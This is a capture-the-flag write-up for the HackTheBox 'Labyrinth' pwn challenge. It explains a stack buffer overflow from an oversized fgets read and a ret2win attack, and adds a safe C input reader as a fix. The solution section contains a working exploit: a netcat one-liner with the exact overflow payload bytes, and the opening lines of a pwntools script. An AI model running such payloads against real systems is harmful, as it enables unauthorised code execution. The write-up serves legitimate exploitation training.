Tags: pwn, free, easy

Labyrinth

HackTheBox

You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.

Techniques: stack_alignment, ret2win, buffer_overflow, return_address_overwrite



Binary Analysis

File: ELF 64-bit executable, not stripped

Security:

  • No PIE (fixed addresses)
  • No stack canary
  • NX enabled (no shellcode execution)
  • Full RELRO

Key findings:

  • Function escape_plan at 0x401255 reads and prints flag.txt
  • This is a classic ret2win scenario

Vulnerability

  1. Program displays 100 doors and asks user to select one
  2. Selecting door 69 triggers special path: "Fly like a bird and be free!"
  3. Program asks if user wants to change choice
  4. Second input uses fgets(s, 0x44, stdin) - reads 68 bytes
  5. Buffer s is at rbp-0x30 (48 bytes from rbp)

Buffer overflow math:

  • Buffer size: 48 bytes
  • Read size: 68 bytes (0x44)
  • Overflow: 20 bytes
  • Offset to return address: 48 (buffer) + 8 (saved rbp) = 56 bytes
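The root cause is an fgets size that is larger than the buffer it writes into. The reader below is an added example (not the challenge binary's code) of how the same door prompt would be read safely: the size comes from the buffer itself, a line that does not fit is drained and rejected instead of being silently truncated, and the value must be a whole number in 1..100. The 48-byte buffer size and the 1..100 door range are taken from the writeup; fmemopen is used only to run it over constructed input.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DOOR_BUF 48   /* same size as the challenge's buffer at rbp-0x30 */

/* The writeup's bug in one line: fgets(s, 0x44, stdin) into char s[48] lets
 * 20 bytes run past the buffer, over the saved rbp and the return address.
 * This reader sizes the read from the buffer, rejects a line that did not
 * fit instead of truncating it, and accepts only a numeric door in 1..100.
 * Returns the door number, -1 if the input is rejected, 0 on EOF. */
int read_door(FILE *in, char *s, size_t cap)
{
    if (fgets(s, (int)cap, in) == NULL)
        return 0;
    char *nl = strchr(s, '\n');
    if (nl != NULL) {
        *nl = '\0';
    } else {
        int c = fgetc(in);
        if (c != EOF) {                 /* buffer filled before end of line */
            while (c != EOF && c != '\n')
                c = fgetc(in);          /* drain it so it cannot be replayed */
            return -1;
        }
    }
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || end == s || *end != '\0' || v < 1 || v > 100)
        return -1;
    return (int)v;
}

/* Run read_door over a constructed in-memory input (fmemopen is POSIX). */
int read_door_from(const char *input)
{
    char s[DOOR_BUF];
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    int door = read_door(in, s, sizeof s);
    fclose(in);
    return door;
}
```

Fed the 56-byte filler line from the writeup, read_door_from returns -1 and nothing is written past the 48-byte buffer.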

Exploitation Strategy

  1. Select door 69 to reach vulnerable code path
  2. Overflow buffer to overwrite return address
  3. Use ret gadget (0x401016) for 16-byte stack alignment (x86_64 ABI requirement)
  4. Jump to escape_plan function to print flag

Solution

Bash one-liner

(echo '69'; sleep 1; printf 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x16\x10\x40\x00\x00\x00\x00\x00\x55\x12\x40\x00\x00\x00\x00\x00'; sleep 3) | nc TARGET_IP TARGET_PORT

Pwntools exploit

#!/usr/bin/env python3
from pwn import *

# Connection
p = remote('TARGET_IP', TARGET_PORT)
# p = process('./labyrinth')  # for local testing

# Select door 69 to reach vulnerable path
p.sendlineafter(b'>> ', b'69')
...
